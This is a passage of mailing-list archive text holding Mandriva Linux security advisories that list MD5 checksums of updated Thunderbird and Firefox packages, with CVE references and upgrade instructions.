 dae3c0e288502232a13f25e0333b9da2  2009.0/x86_64/mozilla-thunderbird-pt_PT-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 272f56aa044370983a5660f4c35db83a  2009.0/x86_64/mozilla-thunderbird-ru-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 f7f078185278e458eb9ad4767c0d4fa2  2009.0/x86_64/mozilla-thunderbird-sk-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 288c3e77b3fc26879dc848c6916a24a1  2009.0/x86_64/mozilla-thunderbird-sl-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 cdff000075368f8c9b75129ea3169fd5  2009.0/x86_64/mozilla-thunderbird-sv_SE-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 275ca5757e819631660b2692baf5f758  2009.0/x86_64/mozilla-thunderbird-tr-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 7d90e3f040607e801552a18f7993cc8c  2009.0/x86_64/mozilla-thunderbird-uk-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 5f076baaf5080f41a29324ea1bef5962  2009.0/x86_64/mozilla-thunderbird-zh_CN-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 3cfa1a5b20458144ccdde93ac8ad5144  2009.0/x86_64/mozilla-thunderbird-zh_TW-2.0.0.21-0.1mdv2009.0.x86_64.rpm
 1abc0ca7ab5941bee219912dba95c8e2  2009.0/x86_64/nsinstall-2.0.0.21-0.1mdv2009.0.x86_64.rpm 
 b67711bfdf7ddba95e784ca4a6c830e1  2009.0/SRPMS/beagle-0.3.8-13.8mdv2009.0.src.rpm
 69a72ca28ceb4058734f0dc92983c6f8  2009.0/SRPMS/mozilla-thunderbird-2.0.0.21-0.1mdv2009.0.src.rpm
 2e8a125773ebcc6c381d0db721143844  2009.0/SRPMS/mozilla-thunderbird-enigmail-l10n-2.0.0.21-0.1mdv2009.0.src.rpm
 c055e5c044ce363b28ec16c1b7ed460f  2009.0/SRPMS/mozilla-thunderbird-l10n-2.0.0.21-0.1mdv2009.0.src.rpm
 79b05327f92194b2458a23d89e74b9f7  2009.0/SRPMS/mozilla-thunderbird-moztraybiff-1.2.4-1.3mdv2009.0.src.rpm

 Corporate 3.0:
 482c3912e5caf1fd77ec857e350fb79f  corporate/3.0/i586/mozilla-thunderbird-2.0.0.21-0.1.C30mdk.i586.rpm
 1be00392fd5bb0e3820fe1e71b688784  corporate/3.0/i586/mozilla-thunderbird-af-2.0.0.21-0.1.C30mdk.i586.rpm
 623435abc79c2860e802afd6e60d8a37  corporate/3.0/i586/mozilla-thunderbird-be-2.0.0.21-0.1.C30mdk.i586.rpm
 8fa3c091b4cfd88fac1fc6a71ce5326d  corporate/3.0/i586/mozilla-thunderbird-bg-2.0.0.21-0.1.C30mdk.i586.rpm
 8cc85f354634c3472bf7f7b25cf52647  corporate/3.0/i586/mozilla-thunderbird-ca-2.0.0.21-0.1.C30mdk.i586.rpm
 dff4e6b92d4c12fdaca73b4ba11ba339  corporate/3.0/i586/mozilla-thunderbird-cs-2.0.0.21-0.1.C30mdk.i586.rpm
 bb2e25074950339f68a0af5738298f6f  corporate/3.0/i586/mozilla-thunderbird-da-2.0.0.21-0.1.C30mdk.i586.rpm
 6b2bba3b1e063cb33a5c2f5b802895d3  corporate/3.0/i586/mozilla-thunderbird-de-2.0.0.21-0.1.C30mdk.i586.rpm
 987d48c512f78799dfff2f1030061326  corporate/3.0/i586/mozilla-thunderbird-devel-2.0.0.21-0.1.C30mdk.i586.rpm
 7bddc9e5b14f77cf12f303062e3d6946  corporate/3.0/i586/mozilla-thunderbird-el-2.0.0.21-0.1.C30mdk.i586.rpm
 d55a1ed4d7f7b2558f1418be3eb53824  corporate/3.0/i586/mozilla-thunderbird-en_GB-2.0.0.21-0.1.C30mdk.i586.rpm
 4c265ddaaaeacb288c2b1279565e5910  corporate/3.0/i586/mozilla-thunderbird-enigmail-2.0.0.21-0.1.C30mdk.i586.rpm
 6bdd56097075454133b3abec1af05384  corporate/3.0/i586/mozilla-thunderbird-enigmail-ar-2.0.0.21-0.1.C30mdk.i586.rpm
 aabfbd3d3a40f4dada0e19197fae4e68  corporate/3.0/i586/mozilla-thunderbird-enigmail-ca-2.0.0.21-0.1.C30mdk.i586.rpm
 1b4bb9ad366453e0105deca25a3195c8  corporate/3.0/i586/mozilla-thunderbird-enigmail-cs-2.0.0.21-0.1.C30mdk.i586.rpm
 765aae8bdb66dc78e0e85fa03e53ffff  corporate/3.0/i586/mozilla-thunderbird-enigmail-de-2.0.0.21-0.1.C30mdk.i586.rpm
 0439aeea7243c757f650acc914e9f839  corporate/3.0/i586/mozilla-thunderbird-enigmail-el-2.0.0.21-0.1.C30mdk.i586.rpm
 9150fca1b175a0555cb9d7b704de92d7  corporate/3.0/i586/mozilla-thunderbird-enigmail-es-2.0.0.21-0.1.C30mdk.i586.rpm
 577d9f8b88db80c70762adf6b693fc60  corporate/3.0/i586/mozilla-thunderbird-enigmail-es_AR-2.0.0.21-0.1.C30mdk.i586.rpm
 57bb4018a59d0350dab99bda3fc992ba  corporate/3.0/i586/mozilla-thunderbird-enigmail-fi-2.0.0.21-0.1.C30mdk.i586.rpm
 baf32f25c565bc30dbf6a12f78f935af  corporate/3.0/i586/mozilla-thunderbird-enigmail-fr-2.0.0.21-0.1.C30mdk.i586.rpm
 3858a7b673159ef5f763a63f62cdca71  corporate/3.0/i586/mozilla-thunderbird-enigmail-hu-2.0.0.21-0.1.C30mdk.i586.rpm
 1d1702057b719e9934036743ee148583  corporate/3.0/i586/mozilla-thunderbird-enigmail-it-2.0.0.21-0.1.C30mdk.i586.rpm
 53b240a21692ecf78493857ddb3043a3  corporate/3.0/i586/mozilla-thunderbird-enigmail-ja-2.0.0.21-0.1.C30mdk.i586.rpm
 8c242ec499ed61ff1436906350971527  corporate/3.0/i586/mozilla-thunderbird-enigmail-ko-2.0.0.21-0.1.C30mdk.i586.rpm
 21a77aa7bb83326712faf3d15d97e776  corporate/3.0/i586/mozilla-thunderbird-enigmail-nb-2.0.0.21-0.1.C30mdk.i586.rpm
 6d7c4b4b990ac726a9ff0e193b78f3b9  corporate/3.0/i586/mozilla-thunderbird-enigmail-nl-2.0.0.21-0.1.C30mdk.i586.rpm
 9d829784fe6a56cbe1e58da4df7d03ff  corporate/3.0/i586/mozilla-thunderbird-enigmail-pl-2.0.0.21-0.1.C30mdk.i586.rpm
 3462834670e927bca4099157f4cf00f7  corporate/3.0/i586/mozilla-thunderbird-enigmail-pt-2.0.0.21-0.1.C30mdk.i586.rpm
 7799e9112de0ed71c8db2201651a1620  corporate/3.0/i586/mozilla-thunderbird-enigmail-pt_BR-2.0.0.21-0.1.C30mdk.i586.rpm
 207442eaf940c108af4d687fcff2aff6  corporate/3.0/i586/mozilla-thunderbird-enigmail-ro-2.0.0.21-0.1.C30mdk.i586.rpm
 e39fc7ee27ccda8eeb3c1883522a3bc2  corporate/3.0/i586/mozilla-thunderbird-enigmail-ru-2.0.0.21-0.1.C30mdk.i586.rpm
 ea9a74bfbcb79b9faebae26227cb134d  corporate/3.0/i586/mozilla-thunderbird-enigmail-sk-2.0.0.21-0.1.C30mdk.i586.rpm
 2bdbe5948a636de4c03a8df22b8f2100  corporate/3.0/i586/mozilla-thunderbird-enigmail-sl-2.0.0.21-0.1.C30mdk.i586.rpm
 d2b2c85240fd3db67a8a36c946e16b01  corporate/3.0/i586/mozilla-thunderbird-enigmail-sv-2.0.0.21-0.1.C30mdk.i586.rpm
 3c5a4a680f12e2618d80193cc7492635  corporate/3.0/i586/mozilla-thunderbird-enigmail-zh_CN-2.0.0.21-0.1.C30mdk.i586.rpm
 cccfd24ade30eeaa35003eb0820d7a25  corporate/3.0/i586/mozilla-thunderbird-enigmail-zh_TW-2.0.0.21-0.1.C30mdk.i586.rpm
 d5f7ca45ff06494e3ea6adc0d4653312  corporate/3.0/i586/mozilla-thunderbird-es_AR-2.0.0.21-0.1.C30mdk.i586.rpm
 a6e71d2f82e5f7c7a0c5c0b4e2348806  corporate/3.0/i586/mozilla-thunderbird-es_ES-2.0.0.21-0.1.C30mdk.i586.rpm
 a6cd88cb99f7585b184b48287c146549  corporate/3.0/i586/mozilla-thunderbird-et_EE-2.0.0.21-0.1.C30mdk.i586.rpm
 59b671912fe3ad2167c94a10bd039c0a  corporate/3.0/i586/mozilla-thunderbird-eu-2.0.0.21-0.1.C30mdk.i586.rpm
 4310aa2f5ff06c18ade5f974971a8f7f  corporate/3.0/i586/mozilla-thunderbird-fi-2.0.0.21-0.1.C30mdk.i586.rpm
 417e6a1492653af56c093e205afa8b31  corporate/3.0/i586/mozilla-thunderbird-fr-2.0.0.21-0.1.C30mdk.i586.rpm
 ade0dae2c698a9d1749665a877a859da  corporate/3.0/i586/mozilla-thunderbird-gu_IN-2.0.0.21-0.1.C30mdk.i586.rpm
 fe7910ace6542633f73ba7658cf6cdc6  corporate/3.0/i586/mozilla-thunderbird-he-2.0.0.21-0.1.C30mdk.i586.rpm
 35fff67058efe4735af1fe6dfea1ea15  corporate/3.0/i586/mozilla-thunderbird-hu-2.0.0.21-0.1.C30mdk.i586.rpm
 63b470ae16e5214e3898e794ed81c577  corporate/3.0/i586/mozilla-thunderbird-it-2.0.0.21-0.1.C30mdk.i586.rpm
 b9eb8ad93ab1e64a906feccd97a0d5c7  corporate/3.0/i586/mozilla-thunderbird-ja-2.0.0.21-0.1.C30mdk.i586.rpm
 fad39072ce6cf3e108387cb86f7fce35  corporate/3.0/i586/mozilla-thunderbird-ko-2.0.0.21-0.1.C30mdk.i586.rpm
 76aa9612c97a2b997cbc5501fa230273  corporate/3.0/i586/mozilla-thunderbird-lt-2.0.0.21-0.1.C30mdk.i586.rpm
 e798f44ca89c39d66b0b640ff6d89b5f  corporate/3.0/i586/mozilla-thunderbird-mk-2.0.0.21-0.1.C30mdk.i586.rpm
 19fede565672e170174874c09c05a715  corporate/3.0/i586/mozilla-thunderbird-nb_NO-2.0.0.21-0.1.C30mdk.i586.rpm
 0ac6c11d28be66d50098e6f2b8e6de00  corporate/3.0/i586/mozilla-thunderbird-nl-2.0.0.21-0.1.C30mdk.i586.rpm
 8efcc97329b6784a091c05e54e1b5c4a  corporate/3.0/i586/mozilla-thunderbird-nn_NO-2.0.0.21-0.1.C30mdk.i586.rpm
 43ca1bc38f62fb77a71a6ddb7fb5f650  corporate/3.0/i586/mozilla-thunderbird-pa_IN-2.0.0.21-0.1.C30mdk.i586.rpm
 d229d6d167a1d551871e8727d4d818e1  corporate/3.0/i586/mozilla-thunderbird-pl-2.0.0.21-0.1.C30mdk.i586.rpm
 7b7eafba30bfe1b94c21ef9caf7ecced  corporate/3.0/i586/mozilla-thunderbird-pt_BR-2.0.0.21-0.1.C30mdk.i586.rpm
 17a5cf084cd8b129d847fc5755dfc819  corporate/3.0/i586/mozilla-thunderbird-pt_PT-2.0.0.21-0.1.C30mdk.i586.rpm
 d36483f148ac8e5e9fe588cd7b726650  corporate/3.0/i586/mozilla-thunderbird-ru-2.0.0.21-0.1.C30mdk.i586.rpm
 7d71b0770b50d084d6314be3bac526e1  corporate/3.0/i586/mozilla-thunderbird-sk-2.0.0.21-0.1.C30mdk.i586.rpm
 463d8485ed0a92ea31f5b18d8e9f6d50  corporate/3.0/i586/mozilla-thunderbird-sl-2.0.0.21-0.1.C30mdk.i586.rpm
 c27adff851583986a465e2c6bcbafa5d  corporate/3.0/i586/mozilla-thunderbird-sv_SE-2.0.0.21-0.1.C30mdk.i586.rpm
 a42e23157a757224782e0bf57d474df1  corporate/3.0/i586/mozilla-thunderbird-tr-2.0.0.21-0.1.C30mdk.i586.rpm
 56ec8521a443f45c5b039f7e08d805f6  corporate/3.0/i586/mozilla-thunderbird-uk-2.0.0.21-0.1.C30mdk.i586.rpm
 279071e92b02eebec3b810c8e66752b8  corporate/3.0/i586/mozilla-thunderbird-zh_CN-2.0.0.21-0.1.C30mdk.i586.rpm
 8f90e9f21f31c235955c37786e5790eb  corporate/3.0/i586/mozilla-thunderbird-zh_TW-2.0.0.21-0.1.C30mdk.i586.rpm
 4cc8b10cf3617d77f2749ce1b7df50ba  corporate/3.0/i586/nsinstall-2.0.0.21-0.1.C30mdk.i586.rpm 
 1b9a3392854c45a3eb3e295a5a4a6540  corporate/3.0/SRPMS/mozilla-thunderbird-2.0.0.21-0.1.C30mdk.src.rpm
 7346e85592525839f884ad95272e0e41  corporate/3.0/SRPMS/mozilla-thunderbird-enigmail-l10n-2.0.0.21-0.1.C30mdk.src.rpm
 8914fa5c17150a463ffb25a9d50b09cb  corporate/3.0/SRPMS/mozilla-thunderbird-l10n-2.0.0.21-0.1.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 42b62b39b5e1e00ebc86b1da0d25f436  corporate/3.0/x86_64/mozilla-thunderbird-2.0.0.21-0.1.C30mdk.x86_64.rpm
 e547b9882cab67245fe8f47faa599919  corporate/3.0/x86_64/mozilla-thunderbird-af-2.0.0.21-0.1.C30mdk.x86_64.rpm
 1be7099271d4512f6b628e43e357de7e  corporate/3.0/x86_64/mozilla-thunderbird-be-2.0.0.21-0.1.C30mdk.x86_64.rpm
 012c29ab2753bd4be30e6068f5f01078  corporate/3.0/x86_64/mozilla-thunderbird-bg-2.0.0.21-0.1.C30mdk.x86_64.rpm
 3514b0bd53fe4634736fe08b90533017  corporate/3.0/x86_64/mozilla-thunderbird-ca-2.0.0.21-0.1.C30mdk.x86_64.rpm
 75493fa930d322fd5ce79c0e25adfa6d  corporate/3.0/x86_64/mozilla-thunderbird-cs-2.0.0.21-0.1.C30mdk.x86_64.rpm
 a86c16811afe2842320078f2b0221407  corporate/3.0/x86_64/mozilla-thunderbird-da-2.0.0.21-0.1.C30mdk.x86_64.rpm
 888164ed1b4b2d0ec8efdf6598d88b73  corporate/3.0/x86_64/mozilla-thunderbird-de-2.0.0.21-0.1.C30mdk.x86_64.rpm
 34bd4a5f8f54994f6d143b410e938b3d  corporate/3.0/x86_64/mozilla-thunderbird-devel-2.0.0.21-0.1.C30mdk.x86_64.rpm
 8e89751b3fb43fc81503597ade868aae  corporate/3.0/x86_64/mozilla-thunderbird-el-2.0.0.21-0.1.C30mdk.x86_64.rpm
 d22d039b6022a38285b045687c6716c3  corporate/3.0/x86_64/mozilla-thunderbird-en_GB-2.0.0.21-0.1.C30mdk.x86_64.rpm
 f05a0da68cd0756b5dd7e851a3bfe2c8  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-2.0.0.21-0.1.C30mdk.x86_64.rpm
 7a18bf0442176f29e8c551aa03e4f903  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-ar-2.0.0.21-0.1.C30mdk.x86_64.rpm
 31224d14e6506393c547ce7c1d98b10e  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-ca-2.0.0.21-0.1.C30mdk.x86_64.rpm
 f0c9f352042fcc4753a2276c9d2fcc35  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-cs-2.0.0.21-0.1.C30mdk.x86_64.rpm
 2e47b5e1097be3ab59eb6d8c4adda485  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-de-2.0.0.21-0.1.C30mdk.x86_64.rpm
 3f7397a1d14c80147c6891d1f9224854  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-el-2.0.0.21-0.1.C30mdk.x86_64.rpm
 e774ff1779c480982c98264e8b8eef53  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-es-2.0.0.21-0.1.C30mdk.x86_64.rpm
 438d5df1ad32fa13594e30d49309dc38  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-es_AR-2.0.0.21-0.1.C30mdk.x86_64.rpm
 09f327c976a8a37916b87d0cebc75712  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-fi-2.0.0.21-0.1.C30mdk.x86_64.rpm
 e32cdfc74609105bca35f323a93c765d  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-fr-2.0.0.21-0.1.C30mdk.x86_64.rpm
 39e633f0b54744e37cddf1717bac0f4c  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-hu-2.0.0.21-0.1.C30mdk.x86_64.rpm
 260db8164154f46198b007911c63f486  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-it-2.0.0.21-0.1.C30mdk.x86_64.rpm
 b3a5e16ed6c604ebdbcabd068422fa85  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-ja-2.0.0.21-0.1.C30mdk.x86_64.rpm
 d7695a99673a44e59898c66e2558c7c5  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-ko-2.0.0.21-0.1.C30mdk.x86_64.rpm
 d5267c23addee68f6733c7cdb7c2ab41  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-nb-2.0.0.21-0.1.C30mdk.x86_64.rpm
 beb66cead3dfcde0211b210318cbd924  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-nl-2.0.0.21-0.1.C30mdk.x86_64.rpm
 368abdb65eff2223b77579dcfa6cf907  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-pl-2.0.0.21-0.1.C30mdk.x86_64.rpm
 e9b8a6de1a1d13873b61c66b1f3cb887  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-pt-2.0.0.21-0.1.C30mdk.x86_64.rpm
 474a6e495db1c2eaa9ee59016e599a7e  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-pt_BR-2.0.0.21-0.1.C30mdk.x86_64.rpm
 40d3917f00f71c4fb38e94fa9b5aad23  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-ro-2.0.0.21-0.1.C30mdk.x86_64.rpm
 a09b0690bb2f4358e7945a44b9b61222  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-ru-2.0.0.21-0.1.C30mdk.x86_64.rpm
 139994dbc93cf3cdb31219249ea4d018  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-sk-2.0.0.21-0.1.C30mdk.x86_64.rpm
 ff7bb1f8fec2734d985c2dcbc7b32692  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-sl-2.0.0.21-0.1.C30mdk.x86_64.rpm
 2f9e397ba62345aeab32353809573397  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-sv-2.0.0.21-0.1.C30mdk.x86_64.rpm
 e736a9a3cb4725b84a992f4174dd9b23  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-zh_CN-2.0.0.21-0.1.C30mdk.x86_64.rpm
 63a092b45093b5784a52ec58423548e8  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-zh_TW-2.0.0.21-0.1.C30mdk.x86_64.rpm
 9645c6f3c34799bc25ae413f4ae94f3b  corporate/3.0/x86_64/mozilla-thunderbird-es_AR-2.0.0.21-0.1.C30mdk.x86_64.rpm
 0991624e3ab4b8f7bb6bf04c96895d7e  corporate/3.0/x86_64/mozilla-thunderbird-es_ES-2.0.0.21-0.1.C30mdk.x86_64.rpm
 e9dbc358da86637586256988e4f33ac9  corporate/3.0/x86_64/mozilla-thunderbird-et_EE-2.0.0.21-0.1.C30mdk.x86_64.rpm
 2c5140b07c5477a307d8b98333cc8cf3  corporate/3.0/x86_64/mozilla-thunderbird-eu-2.0.0.21-0.1.C30mdk.x86_64.rpm
 b68f3bc5bb2839066bc91289697f4aad  corporate/3.0/x86_64/mozilla-thunderbird-fi-2.0.0.21-0.1.C30mdk.x86_64.rpm
 e20f16922436fd7fa069bd465caa5a01  corporate/3.0/x86_64/mozilla-thunderbird-fr-2.0.0.21-0.1.C30mdk.x86_64.rpm
 02711c26490a00322e5d75176e64eb2a  corporate/3.0/x86_64/mozilla-thunderbird-gu_IN-2.0.0.21-0.1.C30mdk.x86_64.rpm
 d4680beb5564468b564c82223bbac956  corporate/3.0/x86_64/mozilla-thunderbird-he-2.0.0.21-0.1.C30mdk.x86_64.rpm
 a749be217b4901069214e7b1608f181e  corporate/3.0/x86_64/mozilla-thunderbird-hu-2.0.0.21-0.1.C30mdk.x86_64.rpm
 4aa624ac5a4a44703c2da7e8a91fddcc  corporate/3.0/x86_64/mozilla-thunderbird-it-2.0.0.21-0.1.C30mdk.x86_64.rpm
 b664a0d6472603fefc6346cc15ae4fce  corporate/3.0/x86_64/mozilla-thunderbird-ja-2.0.0.21-0.1.C30mdk.x86_64.rpm
 2498bc7aae1c4fe3319008fd4ea80266  corporate/3.0/x86_64/mozilla-thunderbird-ko-2.0.0.21-0.1.C30mdk.x86_64.rpm
 80020c500e1a4b77f634fcc6d57e761e  corporate/3.0/x86_64/mozilla-thunderbird-lt-2.0.0.21-0.1.C30mdk.x86_64.rpm
 9e07f4aa96389b760a6cf4f24679bd21  corporate/3.0/x86_64/mozilla-thunderbird-mk-2.0.0.21-0.1.C30mdk.x86_64.rpm
 d7de1383c58048c7d96f5ece3fe2ff43  corporate/3.0/x86_64/mozilla-thunderbird-nb_NO-2.0.0.21-0.1.C30mdk.x86_64.rpm
 df706b04758d44410e16e8facdd3def0  corporate/3.0/x86_64/mozilla-thunderbird-nl-2.0.0.21-0.1.C30mdk.x86_64.rpm
 7f3ab5426a69b5ef67387400cb2cac51  corporate/3.0/x86_64/mozilla-thunderbird-nn_NO-2.0.0.21-0.1.C30mdk.x86_64.rpm
 c60e90c9a99832193fddee46509a5649  corporate/3.0/x86_64/mozilla-thunderbird-pa_IN-2.0.0.21-0.1.C30mdk.x86_64.rpm
 87ff9ba325d4193e862fa40edf68a572  corporate/3.0/x86_64/mozilla-thunderbird-pl-2.0.0.21-0.1.C30mdk.x86_64.rpm
 45bf4e5627aaf5aa6e9df25693ded839  corporate/3.0/x86_64/mozilla-thunderbird-pt_BR-2.0.0.21-0.1.C30mdk.x86_64.rpm
 9f8655219bf0f1dda15fd5b03e0c8345  corporate/3.0/x86_64/mozilla-thunderbird-pt_PT-2.0.0.21-0.1.C30mdk.x86_64.rpm
 63e8869ba7a0af46157a6fd732cbe6f4  corporate/3.0/x86_64/mozilla-thunderbird-ru-2.0.0.21-0.1.C30mdk.x86_64.rpm
 513ac92f1d775e9b58f8ed234c17ad45  corporate/3.0/x86_64/mozilla-thunderbird-sk-2.0.0.21-0.1.C30mdk.x86_64.rpm
 dea9b06b36d0ae9153329142c69a13e6  corporate/3.0/x86_64/mozilla-thunderbird-sl-2.0.0.21-0.1.C30mdk.x86_64.rpm
 3a8e4f786a30d9a8d0cf4c0a91924b9f  corporate/3.0/x86_64/mozilla-thunderbird-sv_SE-2.0.0.21-0.1.C30mdk.x86_64.rpm
 e9e79a2416039a17281f4f9352b45afa  corporate/3.0/x86_64/mozilla-thunderbird-tr-2.0.0.21-0.1.C30mdk.x86_64.rpm
 a715845925c669a4f7f1e4cc4b6210ce  corporate/3.0/x86_64/mozilla-thunderbird-uk-2.0.0.21-0.1.C30mdk.x86_64.rpm
 37c8723292ad79f47e194e3ed9ec7b24  corporate/3.0/x86_64/mozilla-thunderbird-zh_CN-2.0.0.21-0.1.C30mdk.x86_64.rpm
 b6d7ceb0e67acfbff1121353339ecbbe  corporate/3.0/x86_64/mozilla-thunderbird-zh_TW-2.0.0.21-0.1.C30mdk.x86_64.rpm
 0b48e9ebe5699fe12e80159ad66a998e  corporate/3.0/x86_64/nsinstall-2.0.0.21-0.1.C30mdk.x86_64.rpm 
 1b9a3392854c45a3eb3e295a5a4a6540  corporate/3.0/SRPMS/mozilla-thunderbird-2.0.0.21-0.1.C30mdk.src.rpm
 7346e85592525839f884ad95272e0e41  corporate/3.0/SRPMS/mozilla-thunderbird-enigmail-l10n-2.0.0.21-0.1.C30mdk.src.rpm
 8914fa5c17150a463ffb25a9d50b09cb  corporate/3.0/SRPMS/mozilla-thunderbird-l10n-2.0.0.21-0.1.C30mdk.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFJ0zQ4mqjQ0CJFipgRArcKAKCbWWsQMi6SXb+5YDnKJH3RXfn1YACggVh8
SzwSKO9PxrjK9PeyQVDUaXo=
=2a/O
-----END PGP SIGNATURE-----



From security at mandriva.com  Wed Apr  1 14:39:00 2009
From: security at mandriva.com (security at mandriva.com)
Date: Wed, 01 Apr 2009 15:39:00 +0200
Subject: [Full-disclosure] [ MDVSA-2009:084 ] firefox
Message-ID: <E1Lp0ei-0007a9-7K@titan.mandriva.com>


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2009:084
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : firefox
 Date    : April 1, 2009
 Affected: 2008.1, 2009.0
 _______________________________________________________________________

 Problem Description:

 Security vulnerabilities have been discovered in previous versions,
 and corrected in the latest Mozilla Firefox 3.x, version 3.0.8
 (CVE-2009-1044, CVE-2009-1169).
 
 This update provides the latest Mozilla Firefox 3.x to correct
 these issues.
 
 Additionally, some packages requiring it have also been rebuilt and
 are being provided as updates.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1044
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1169
 http://www.mozilla.org/security/known-vulnerabilities/firefox30.html#firefox3.0.8
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2008.1:
 4bd1da595441ee2fe8afdea889dfb7c6  2008.1/i586/devhelp-0.19-3.10mdv2008.1.i586.rpm
 6cc46038974178ec09b1696a65b4c5b4  2008.1/i586/devhelp-plugins-0.19-3.10mdv2008.1.i586.rpm
 b5d7ccd4c481d84d70ca146849c94197  2008.1/i586/epiphany-2.22.3-0.5mdv2008.1.i586.rpm
 cb01c7e7d25f2b9b63480ca1073905a7  2008.1/i586/epiphany-devel-2.22.3-0.5mdv2008.1.i586.rpm
 f0ef746eb2d8663d060903e39e4fee3b  2008.1/i586/firefox-3.0.8-0.1mdv2008.1.i586.rpm
 6785a38a7771b0db48f424ef4903cecb  2008.1/i586/firefox-af-3.0.8-0.1mdv2008.1.i586.rpm
 592379e4f9e1854af05e99baa23023b1  2008.1/i586/firefox-ar-3.0.8-0.1mdv2008.1.i586.rpm
 453ed026c5c07f74f184f6ef400c22b4  2008.1/i586/firefox-be-3.0.8-0.1mdv2008.1.i586.rpm
 9f62cf2ef20aea3dd1185276ac82f774  2008.1/i586/firefox-bg-3.0.8-0.1mdv2008.1.i586.rpm
 6018ce74d5a7189194dad827c745a077  2008.1/i586/firefox-bn-3.0.8-0.1mdv2008.1.i586.rpm
 4c8ab45998fef019ad40a3bd145a1e4f  2008.1/i586/firefox-ca-3.0.8-0.1mdv2008.1.i586.rpm
 7969639a289dc1e0b1261f9f1fe9024a  2008.1/i586/firefox-cs-3.0.8-0.1mdv2008.1.i586.rpm
 6b6baf61fb2da4a8aadc1c3c80724101  2008.1/i586/firefox-cy-3.0.8-0.1mdv2008.1.i586.rpm
 4c3741bed9f080f75e901096634af332  2008.1/i586/firefox-da-3.0.8-0.1mdv2008.1.i586.rpm
 f63ccbca0cadb4acd40ece63882bb285  2008.1/i586/firefox-de-3.0.8-0.1mdv2008.1.i586.rpm
 06759545ae034cc726d9225f69b87a09  2008.1/i586/firefox-el-3.0.8-0.1mdv2008.1.i586.rpm
 260eacb9d27dbc60da37f2ccdd38dbb0  2008.1/i586/firefox-en_GB-3.0.8-0.1mdv2008.1.i586.rpm
 fa2aade2f3acbf38b04855e0449794ea  2008.1/i586/firefox-eo-3.0.8-0.1mdv2008.1.i586.rpm
 5725d15781889ce7a671756616529a6f  2008.1/i586/firefox-es_AR-3.0.8-0.1mdv2008.1.i586.rpm
 d152100d23c5635b3f99daa0631b4857  2008.1/i586/firefox-es_ES-3.0.8-0.1mdv2008.1.i586.rpm
 b4c65612b09891f46a552a31fe09a5ec  2008.1/i586/firefox-et-3.0.8-0.1mdv2008.1.i586.rpm
 f477e210a0289e0960d44125644d3440  2008.1/i586/firefox-eu-3.0.8-0.1mdv2008.1.i586.rpm
 794926bfe90e13450fdeed53172cf19a  2008.1/i586/firefox-fi-3.0.8-0.1mdv2008.1.i586.rpm
 53b973aef6db8dd8fc81cd253a478164  2008.1/i586/firefox-fr-3.0.8-0.1mdv2008.1.i586.rpm
 cb1c6cf0f31e393b212ff6beca1eada8  2008.1/i586/firefox-fy-3.0.8-0.1mdv2008.1.i586.rpm
 fff87c20313fbc0d0cc65a5895ed8a48  2008.1/i586/firefox-ga_IE-3.0.8-0.1mdv2008.1.i586.rpm
 8efc805898e03f6f03cb6637ba53938b  2008.1/i586/firefox-gl-3.0.8-0.1mdv2008.1.i586.rpm
 80aa1da38223075724a374f0eb12510c  2008.1/i586/firefox-gu_IN-3.0.8-0.1mdv2008.1.i586.rpm
 e33cab7239de61d3d08881128b2dca53  2008.1/i586/firefox-he-3.0.8-0.1mdv2008.1.i586.rpm
 d184f8baf2815f71eda2c19d337bb88a  2008.1/i586/firefox-hi-3.0.8-0.1mdv2008.1.i586.rpm
 0a40f0d4a05d620a56d4dd68720ed8df  2008.1/i586/firefox-hu-3.0.8-0.1mdv2008.1.i586.rpm
 5bbde2522061872085c27107b40aadd3  2008.1/i586/firefox-id-3.0.8-0.1mdv2008.1.i586.rpm
